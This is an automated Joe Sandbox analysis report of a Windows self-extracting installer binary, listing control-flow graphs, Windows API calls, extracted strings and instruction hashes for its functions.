                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 401 404b55-404bd1 LoadLibraryA #17 call 40768f call 4030a0 * 6 416 404bd7-404be9 SHGetSpecialFolderPathW 401->416 417 404c38-404c3c 416->417 418 404beb-404c08 wsprintfW call 404033 416->418 417->416 420 404c3e-404c42 417->420 421 404c0d-404c10 418->421 422 404c12-404c18 421->422 423 404c30-404c36 422->423 424 404c1a-404c2d call 404033 422->424 423->417 423->422 424->423
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32), ref: 00404B66
                                                    • #17.COMCTL32 ref: 00404B71
                                                      • Part of subcall function 004030A0: GetLastError.KERNEL32(00000000,?,0000FDE9), ref: 004030E7
                                                      • Part of subcall function 004030A0: wsprintfW.USER32 ref: 004030F8
                                                      • Part of subcall function 004030A0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403107
                                                      • Part of subcall function 004030A0: GetLastError.KERNEL32 ref: 00403112
                                                      • Part of subcall function 004030A0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000001), ref: 0040313C
                                                      • Part of subcall function 004030A0: GetLastError.KERNEL32 ref: 00403147
                                                      • Part of subcall function 004030A0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403159
                                                      • Part of subcall function 004030A0: SetLastError.KERNEL32(0000FDE9), ref: 0040318D
                                                      • Part of subcall function 004030A0: lstrlenA.KERNEL32(0041C988), ref: 004031C3
                                                      • Part of subcall function 004030A0: GetLocaleInfoW.KERNELBASE(?,00001004,?,0000001F), ref: 00403212
                                                      • Part of subcall function 004030A0: _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00403223
                                                      • Part of subcall function 004030A0: MultiByteToWideChar.KERNEL32(000004E4,00000000,0041C988,00000001,00000000,00000002), ref: 00403249
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404BE1
                                                    • wsprintfW.USER32 ref: 00404BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnvironmentVariablewsprintf$ByteCharFolderInfoLibraryLoadLocaleMultiPathSpecialWide_wtollstrcmpilstrlen
                                                    • String ID: X_$SfxFolder%02d$kernel32
                                                    • API String ID: 3992867532-4069207936
                                                    • Opcode ID: b421ebe6b715a4417a1035f21c31ec6f16a4e254f716bb883ef1bcc1e6194833
                                                    • Instruction ID: 89a8dc293236b0d0fc7814e9228c4fb2a05a67d15382cf7a7f96f31eac11dc57
                                                    • Opcode Fuzzy Hash: b421ebe6b715a4417a1035f21c31ec6f16a4e254f716bb883ef1bcc1e6194833
                                                    • Instruction Fuzzy Hash: 7321C8F2E41208ABD7206FB1AC85BC97AACAB94305F40017BF601E71A5EA3D55818F5C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 427 401f28-401f35 428 401f41-401f4c 427->428 429 401f37-401f3c 427->429 431 401f55-401f64 428->431 432 401f4e-401f50 428->432 430 402229-40222a 429->430 434 401f66-401f6c 431->434 435 401f6e-401f8f call 409822 431->435 433 402228 432->433 433->430 434->435 438 401f95-401fa1 call 40e457 435->438 439 40221c-402227 call 40ee93 435->439 444 401fa7-401fac 438->444 445 402209-402211 438->445 439->433 444->445 446 401fb2-402002 call 40e589 call 40e615 call 40e589 call 41a3c0 444->446 449 402213-40221b call 41a3c0 445->449 460 402008-40200c 446->460 461 4021ff-402207 call 40ee93 446->461 449->439 463 402013-402018 460->463 464 40200e-402011 460->464 461->449 467 402027-40202a 463->467 468 40201a 463->468 466 40202d-402043 464->466 466->461 471 402049-402069 466->471 467->466 469 40201c-402022 468->469 473 4021fd 469->473 471->461 475 40206f-402075 471->475 473->461 476 402090-4020a2 GetLocalTime SystemTimeToFileTime 475->476 477 402077-40207a 475->477 480 4020a8-4020ac 476->480 478 402080-40208e 477->478 479 40207c-40207e 477->479 478->480 479->469 481 4020c6-4020d4 call 40325a 480->481 482 4020ae-4020b9 call 402648 480->482 487 4020da-4020dd 481->487 488 4021ee-4021f9 GetLastError 481->488 489 4021ea-4021ec 482->489 490 4020bf-4020c1 482->490 487->489 491 4020e3-4020ef call 41a382 487->491 488->473 489->461 490->469 494 402101 491->494 495 4020f1-4020ff 491->495 496 402103-40210c 494->496 495->496 497 402117-402128 call 40d1c2 496->497 498 40210e-402114 496->498 501 40212d-40212f 497->501 498->497 502 402135-402158 GetLastError call 40e3ef call 403008 501->502 503 4021cc-4021dc call 4011d7 501->503 512 402167-40217e call 402648 502->512 513 40215a-402165 502->513 509 4021de-4021e0 503->509 509->461 511 4021e2-4021e8 509->511 511->461 519 402180-402188 512->519 520 40218a-4021a5 call 40d1c2 512->520 518 4021b6-4021c1 call 41a3c0 513->518 518->509 519->518 526 4021c3-4021cb call 41a3c0 520->526 527 4021a7-4021b2 GetLastError 520->527 526->503 527->518
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G"@
                                                    • API String ID: 0-1543128551
                                                    • Opcode ID: 902ae6c0eb8b4ff0883d1864bb150b8d0177d7163e04afd0f79fdd1796088568
                                                    • Instruction ID: 014c61ef234fb2cc4baf5c7837711bf9ccce270aa3eba8b9d283cb3c51cd8214
                                                    • Opcode Fuzzy Hash: 902ae6c0eb8b4ff0883d1864bb150b8d0177d7163e04afd0f79fdd1796088568
                                                    • Instruction Fuzzy Hash: DDA1A171900205AFCF10DFA4CD88AAA77B9BF48314F20416BF901BB2D1DBB8D942CB94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 531 401896-4018ca call 40e457 call 402434 call 40478e 538 4018cb-4018dd call 40259c 531->538 541 4018e8-4018fc call 40259c 538->541 542 4018df-4018e6 538->542 545 40191b-40192d call 40259c 541->545 546 4018fe-401905 541->546 542->538 552 401965 545->552 553 40192f-401941 call 40259c 545->553 547 401917-401919 546->547 548 401907-401912 _wtol 546->548 551 401967-40196a 547->551 548->547 551->538 552->551 553->552 556 401943-40194c call 4036ff 553->556 559 401953-40195c call 4036ba 556->559 560 40194e-401951 556->560 563 40195e 559->563 564 40196f-40197b 559->564 560->552 563->552 565 4019d0-4019e1 call 40e522 call 40e6f7 564->565 566 40197d-401981 564->566 580 4019e3-401a17 call 40e457 call 403800 call 40e420 call 40478e call 401ca7 565->580 567 401983-40199b call 40e589 call 40e6f7 * 2 566->567 568 40199d-40199e call 40e589 566->568 575 4019a3-4019b6 call 4035c2 567->575 568->575 575->580 584 4019b8-4019ce call 40e6f7 * 2 575->584 599 401aec-401b15 call 41a3c0 * 2 call 4024a7 call 41a3c0 580->599 600 401a1d-401a23 580->600 584->580 601 401a25-401a29 call 40e6f7 600->601 602 401a2e-401a9b call 40478e call 40e65a call 40e635 call 40e615 call 40e420 call 41a3c0 * 3 call 401b98 600->602 601->602 629 401aa0-401aa5 602->629 630 401ab7-401abe 629->630 631 401aa7-401ab5 call 41a3c0 call 401c79 629->631 633 401ac0-401acb GetLastError 630->633 634 401acd-401ad8 call 407280 630->634 631->599 633->634 636 401adb-401aeb call 404b3f call 41a3c0 633->636 634->636 636->599
                                                    APIs
                                                      • Part of subcall function 00402434: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,004018B9,?,?,?,?), ref: 0040244D
                                                      • Part of subcall function 00402434: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00402463
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?,?,?,?,?), ref: 0040190B
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401AC0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$ErrorLast_wtol
                                                    • String ID: ExecuteParameters$del$hidcon$shc
                                                    • API String ID: 1962837881-796110186
                                                    • Opcode ID: ae64264f67d199b70bf70bd0f58bd8e74997cb805c53ebfa10936986b9a4cc5b
                                                    • Instruction ID: d78e6fe2fc078fe1fb2f15453550ca39fa6452a259d23795430bc67ec2622554
                                                    • Opcode Fuzzy Hash: ae64264f67d199b70bf70bd0f58bd8e74997cb805c53ebfa10936986b9a4cc5b
                                                    • Instruction Fuzzy Hash: BE61DA729001196ACB11BBE2EC92ADE7778AF15318F10443FF801721E2EB7D5A54CA6D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 670 4039f5-403a48 call 41a650 call 40d63b lstrlenA * 2 674 403a4b-403a68 call 40d5d5 670->674 676 403b51 674->676 677 403a6e-403a73 674->677 678 403b53-403b57 676->678 677->676 679 403a79-403a84 677->679 680 403a86-403a8a 679->680 681 403a8c-403a93 680->681 682 403acd-403ad4 680->682 683 403b00-403b2c call 417540 681->683 685 403a95-403aa4 call 415e7f 681->685 682->683 684 403ad6-403ae5 call 415e7f 682->684 696 403b45-403b4f 683->696 697 403b2e 683->697 694 403ac2-403ac8 684->694 695 403ae7-403afe 684->695 692 403b40-403b43 685->692 693 403aaa-403ab1 685->693 692->678 693->676 698 403ab7-403abd call 4024ca 693->698 699 403ac9-403acb 694->699 695->699 696->678 700 403b30-403b36 697->700 701 403b38-403b3b 697->701 698->694 699->680 700->696 700->701 701->674
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,?,?,004037B2,?,;!@Install@!UTF-8!,;!@InstallEnd@!,?), ref: 00403A27
                                                    • lstrlenA.KERNEL32(?,?,?,004037B2,?,;!@Install@!UTF-8!,;!@InstallEnd@!,?), ref: 00403A2F
                                                    • _memcmp.LIBVCRUNTIME ref: 00403A9A
                                                    • _memcmp.LIBVCRUNTIME ref: 00403ADB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmplstrlen
                                                    • String ID:
                                                    • API String ID: 107979428-0
                                                    • Opcode ID: 24fa67dd89d87232b2317cf213c8b28d584d317f3ca0f03376eb79333407719e
                                                    • Instruction ID: 6402c627ec436edd1f87d5aa906f155b919943eeefaeb0d80dc221bf8a7ac236
                                                    • Opcode Fuzzy Hash: 24fa67dd89d87232b2317cf213c8b28d584d317f3ca0f03376eb79333407719e
                                                    • Instruction Fuzzy Hash: B9417071E00259AFCB00DFA9CC84BEEBBB9EF45349F14406AE855B7241E674AE41CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 705 401d61-401d9c call 40239c CreateThread 708 401dc1-401dce 705->708 709 401d9e-401da5 705->709 710 401dd0-401dd3 708->710 711 401e03-401e0e 708->711 712 401db2-401dbb WaitForSingleObject 709->712 713 401da7-401dac call 405f27 709->713 716 401dd5-401dd8 710->716 717 401df7 710->717 714 401e10-401e12 711->714 715 401e67 711->715 712->708 713->712 719 401e14-401e24 GetExitCodeThread 714->719 720 401e2e-401e39 714->720 724 401e6c-401e6f 715->724 721 401df3-401df5 716->721 722 401dda-401ddd 716->722 723 401df9-401e01 call 407280 717->723 719->720 726 401e26-401e28 719->726 727 401e40-401e46 720->727 728 401e3b-401e3e 720->728 721->723 729 401def-401df1 722->729 730 401ddf-401de2 722->730 723->715 726->720 732 401e2a-401e2c 726->732 736 401e51-401e5d SetLastError 727->736 737 401e48-401e4f 727->737 733 401dec-401ded 728->733 729->723 734 401de4-401de7 730->734 735 401de9-401dea 730->735 732->724 739 401e5f-401e64 call 407280 733->739 734->715 734->735 735->733 736->739 737->715 737->736 739->715
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001ECF,?,00000000,?), ref: 00401D8C
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,?), ref: 00401DB5
                                                    • GetExitCodeThread.KERNELBASE(00000000,?,?,00000000,?,?), ref: 00401E19
                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 00401E52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 2732711357-0
                                                    • Opcode ID: cdba668cde040187ae8bc5d380b77640ac0343d47f686720fa2e3dc68632ca05
                                                    • Instruction ID: c199a7d70de278c96d800d4c4787870e84706badbc32cc5c702e27f211e5f69e
                                                    • Opcode Fuzzy Hash: cdba668cde040187ae8bc5d380b77640ac0343d47f686720fa2e3dc68632ca05
                                                    • Instruction Fuzzy Hash: 83310779700201BADB345B55DC85EAB3669EBC5714B20813FFC02E52F0D67CD882DA9D

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00402F39: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0000FDE9,00000001), ref: 00402F67
                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00402ADF
                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000001), ref: 00402B02
                                                    • wsprintfW.USER32 ref: 00402B33
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 00402B4F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: PathTemp$AttributesFilewcsncpywsprintf
                                                    • String ID:
                                                    • API String ID: 1999176734-0
                                                    • Opcode ID: abcf9953a8667e16599663c1dfca3f9779a9e0039f4c80580b6036b14b5af4cd
                                                    • Instruction ID: 9041bacfb6c6e904b5f526c5c7ee405d76f87ccf5e001e4bc097786daec979fc
                                                    • Opcode Fuzzy Hash: abcf9953a8667e16599663c1dfca3f9779a9e0039f4c80580b6036b14b5af4cd
                                                    • Instruction Fuzzy Hash: C211DAB1600615ABC7159F65DC8586EBBADFF48314700413BF80AE72D0DBB4AD10CBD8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 771 41a382-41a385 772 41a394-41a39f malloc 771->772 773 41a3a1-41a3a2 772->773 774 41a387-41a392 _callnewh 772->774 774->772 775 41a3a3-41a3a7 774->775 776 41af58-41af74 call 41af23 call 417e5f 775->776 777 41a3ad-41af57 call 41aef0 call 417e5f 775->777 777->776
                                                    APIs
                                                    • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040EA5E,00000000,?,?,?,?,0040E89D,?,004013F4), ref: 0041A38A
                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040EA5E,00000000,?,?,?,?,0040E89D,?,004013F4), ref: 0041A397
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041AF52
                                                      • Part of subcall function 00417E5F: RaiseException.KERNEL32(?,?,?,?,?), ref: 00417EBF
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041AF6F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 741831685-0
                                                    • Opcode ID: 5188dd4440d2aebed5194a4df2a70dbb7e3a0744a34103635fae928e41412777
                                                    • Instruction ID: f71766f8df808d0e3d19d2cfb548cc6a2cba49196036a5e802b877e77bbad8cb
                                                    • Opcode Fuzzy Hash: 5188dd4440d2aebed5194a4df2a70dbb7e3a0744a34103635fae928e41412777
                                                    • Instruction Fuzzy Hash: 1BF0BB7440530D76CB00B6B5E806ADE376C8A00714B504227BD34914D2EF7CEAFA81DF

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 796 4040b7-4040c8 CreateDirectoryW 797 4040f9-4040fb 796->797 798 4040ca-4040d7 GetLastError 796->798 801 4040fc-4040fe 797->801 799 4040e4-4040f0 GetFileAttributesW 798->799 800 4040d9 798->800 799->797 803 4040f2-4040f4 799->803 802 4040da-4040e2 SetLastError 800->802 802->801 803->797 804 4040f6-4040f7 803->804 804->802
                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,?,004026C8,00000000,00000000,?,?,?), ref: 004040C0
                                                    • GetLastError.KERNEL32(?,004026C8,00000000,00000000,?,?,?), ref: 004040CA
                                                    • SetLastError.KERNEL32(000000B7,?,004026C8,00000000,00000000,?,?,?), ref: 004040DA
                                                    • GetFileAttributesW.KERNELBASE(?,?,004026C8,00000000,00000000,?,?,?), ref: 004040E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                    • String ID:
                                                    • API String ID: 635176117-0
                                                    • Opcode ID: fc3b4acc21d604c55579aa30976d1510510e2051daad52f76ce52624391b0c06
                                                    • Instruction ID: ea16b448f520dc79c21dd080c1741ec492af41fa6e4510644d8e6435286e1c67
                                                    • Opcode Fuzzy Hash: fc3b4acc21d604c55579aa30976d1510510e2051daad52f76ce52624391b0c06
                                                    • Instruction Fuzzy Hash: 0BE092B0584214EBDB201BB5DC487AB3E58AB49769F10C532FB1AF01E1DB38885266AD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 805 4032cb-4032e4 GetProcAddress 806 4032f2-4032f5 805->806 807 4032e6-4032f1 GetNativeSystemInfo 805->807
                                                    APIs
                                                    • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 004032DC
                                                    • GetNativeSystemInfo.KERNELBASE(?,?,00401CB5,?,00401A13,?,00401862,00000000), ref: 004032EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: AddressInfoNativeProcSystem
                                                    • String ID: GetNativeSystemInfo
                                                    • API String ID: 2220751540-3949249589
                                                    • Opcode ID: 050bbb88f7cf7218444c34c7b330fe598677fc76e94ff6b6c683a7f068fb1840
                                                    • Instruction ID: ed6175da09a8fdebb0e1c5cb843e23d8266677c44094019fbcf6b946119c3695
                                                    • Opcode Fuzzy Hash: 050bbb88f7cf7218444c34c7b330fe598677fc76e94ff6b6c683a7f068fb1840
                                                    • Instruction Fuzzy Hash: CAD0A72034020896CB10AFF1AD425EB3BE8964C60875004B4A403F00D0EA79DD41D768
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNELBASE(?,?,?), ref: 00404B24
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable
                                                    • String ID: pEa
                                                    • API String ID: 1431749950-470506444
                                                    • Opcode ID: 449d396a4c0592938005a495febcc4e1e637c5bd27616c37eebfc57c463b90e8
                                                    • Instruction ID: c0725f4f22a8b11be2ee7f0584f20d2504650d76fe49a34672655117b88c2384
                                                    • Opcode Fuzzy Hash: 449d396a4c0592938005a495febcc4e1e637c5bd27616c37eebfc57c463b90e8
                                                    • Instruction Fuzzy Hash: 19F0F471A00018AFCB10ABD5EC4598DB778EB54344B4040BAE951E7271DF34E5558B99
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040D2D1
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040D2DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 566180bda5cd697e6ffadec7a179c8b1af85430c6e7af7f385284b26b0bcd381
                                                    • Instruction ID: fbbf36c10446a8afaa6e887ab57a6d4605db8d6981e568fa3a93448fb21df84f
                                                    • Opcode Fuzzy Hash: 566180bda5cd697e6ffadec7a179c8b1af85430c6e7af7f385284b26b0bcd381
                                                    • Instruction Fuzzy Hash: 6DF05E71904218ABCF04CFA9DC44ADF7BE8EF0A320B108169F816D73A1D231DD10ABA9
                                                    APIs
                                                    • Sleep.KERNEL32(00000014), ref: 00401EDF
                                                    • EndDialog.USER32(00000000,00000000), ref: 00401F1B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: DialogSleep
                                                    • String ID:
                                                    • API String ID: 2355613043-0
                                                    • Opcode ID: 648b835b9d7420a1580e0270d6d219351fb6242d02cac78e384673360c5cd647
                                                    • Instruction ID: eb96ffe11cc144af6055908b6645f6fe756304b6d041abb8b9a4700c22e9385a
                                                    • Opcode Fuzzy Hash: 648b835b9d7420a1580e0270d6d219351fb6242d02cac78e384673360c5cd647
                                                    • Instruction Fuzzy Hash: AFF08230345201ABCB388BC4ED89B667765EB54761FA001BAFA02AA2F0C7749881C79C
                                                    APIs
                                                      • Part of subcall function 0041B0AC: GetModuleHandleW.KERNEL32(00000000,0041AA27), ref: 0041B0AE
                                                    • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0041AA70
                                                    • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,0041F4A0,00000014), ref: 0041AA9F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: HandleModule_c_exit_exit
                                                    • String ID:
                                                    • API String ID: 750871209-0
                                                    • Opcode ID: 35a5967350528554db479f19048b56f11e27a7bd188c72d566efeabd89bc8f4a
                                                    • Instruction ID: 6887ee1ec2eb04b24837a7a7bb84dec1efbc51443f5b412f5016766e90586c20
                                                    • Opcode Fuzzy Hash: 35a5967350528554db479f19048b56f11e27a7bd188c72d566efeabd89bc8f4a
